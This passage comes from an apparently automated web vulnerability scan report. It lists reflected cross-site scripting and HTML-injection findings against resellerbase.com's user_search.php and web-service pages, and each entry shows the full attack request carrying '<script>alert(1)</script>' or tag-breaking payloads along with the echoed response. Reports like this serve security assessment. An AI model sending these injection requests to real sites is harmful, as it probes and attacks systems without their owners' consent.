Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?occupation=555-555-0199@example.comc098b"><a>bee91fbe589&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers
...[SNIP]...

2.4950. http://www.resellerbase.com/user_search.php [submit parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8b4"><a>c83a76ca756 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsersaf8b4"><a>c83a76ca756&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsersaf8b4"><a>c83a76ca756&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com&ltr=%23">
...[SNIP]...

2.4951. http://www.resellerbase.com/user_search.php [username parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab674"><a>468a269669e was submitted in the username parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=ab674"><a>468a269669e&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=ab674"><a>468a269669e&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4952. http://www.resellerbase.com/user_search.php [yahoo parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the yahoo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4ec8"><a>9ecf5e06819 was submitted in the yahoo parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=3&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=a4ec8"><a>9ecf5e06819&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=a4ec8"><a>9ecf5e06819&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4953. http://www.resellerbase.com/web-service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8edca<script>alert(1)</script>ff5895c7b43d980cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service8edca<script>alert(1)</script>ff5895c7b43d980cf/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8edca<script>alert(1)</script>ff5895c7b43d980cf/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4954. http://www.resellerbase.com/web-service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 444e5<script>alert(1)</script>6746596f832 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service444e5<script>alert(1)</script>6746596f832/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service444e5<script>alert(1)</script>6746596f832/ was not found on this server.</p>
...[SNIP]...

2.4955. http://www.resellerbase.com/web-service/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e7b4<script>alert(1)</script>e2da2ea57f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/?7e7b4<script>alert(1)</script>e2da2ea57f1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/?7e7b4<script>alert(1)</script>e2da2ea57f1=1 was not found on this server.</p>
...[SNIP]...

2.4956. http://www.resellerbase.com/web-service/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload d14de<a>81118b9405d was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd14de<a>81118b9405d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd14de<a>81118b9405d was not found on this server.</p>
...[SNIP]...

2.4957. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c541<script>alert(1)</script>70426b600e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5c541<script>alert(1)</script>70426b600e/domain-names/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5c541<script>alert(1)</script>70426b600e/domain-names/ was not found on this server.</p>
...[SNIP]...

2.4958. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab0d8<script>alert(1)</script>d74af83afc8105d92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-serviceab0d8<script>alert(1)</script>d74af83afc8105d92/domain-names/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceab0d8<script>alert(1)</script>d74af83afc8105d92/domain-names/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4959. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7947c<script>alert(1)</script>05c5c3e4ee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names7947c<script>alert(1)</script>05c5c3e4ee2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names7947c<script>alert(1)</script>05c5c3e4ee2/ was not found on this server.</p>
...[SNIP]...

2.4960. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54146<script>alert(1)</script>c2e3b5c5c5b400379 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/domain-names54146<script>alert(1)</script>c2e3b5c5c5b400379/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names54146<script>alert(1)</script>c2e3b5c5c5b400379/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4961. http://www.resellerbase.com/web-service/domain-names/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7ac69<script>alert(1)</script>2bfa65558b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/?7ac69<script>alert(1)</script>2bfa65558b9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/?7ac69<script>alert(1)</script>2bfa65558b9=1 was not found on this server.</p>
...[SNIP]...

2.4962. http://www.resellerbase.com/web-service/domain-names/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 3f88f<a>e03be7ccc32 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3f88f<a>e03be7ccc32 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3f88f<a>e03be7ccc32 was not found on this server.</p>
...[SNIP]...

2.4963. http://www.resellerbase.com/web-service/domain-names/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a98fc<script>alert(1)</script>8bbebc14c8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea98fc<script>alert(1)</script>8bbebc14c8e/domain-names/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea98fc<script>alert(1)</script>8bbebc14c8e/domain-names/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4964. http://www.resellerbase.com/web-service/domain-names/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70bc1<script>alert(1)</script>2d2eedb6197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names70bc1<script>alert(1)</script>2d2eedb6197/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names70bc1<script>alert(1)</script>2d2eedb6197/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4965. http://www.resellerbase.com/web-service/domain-names/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 105e7<script>alert(1)</script>91992e35add was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/googlepr.php105e7<script>alert(1)</script>91992e35add HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/googlepr.php105e7<script>alert(1)</script>91992e35add was not found on this server.</p>
...[SNIP]...

2.4966. http://www.resellerbase.com/web-service/domain-names/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload f7eee<a>92ad28955c was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/googlepr.php?link_id=4f7eee<a>92ad28955c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/googlepr.php?link_id=4f7eee<a>92ad28955c was not found on this server.</p>
...[SNIP]...

2.4967. http://www.resellerbase.com/web-service/domain-names/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41f08<script>alert(1)</script>5f47ac5054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/googlepr.php?41f08<script>alert(1)</script>5f47ac5054=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
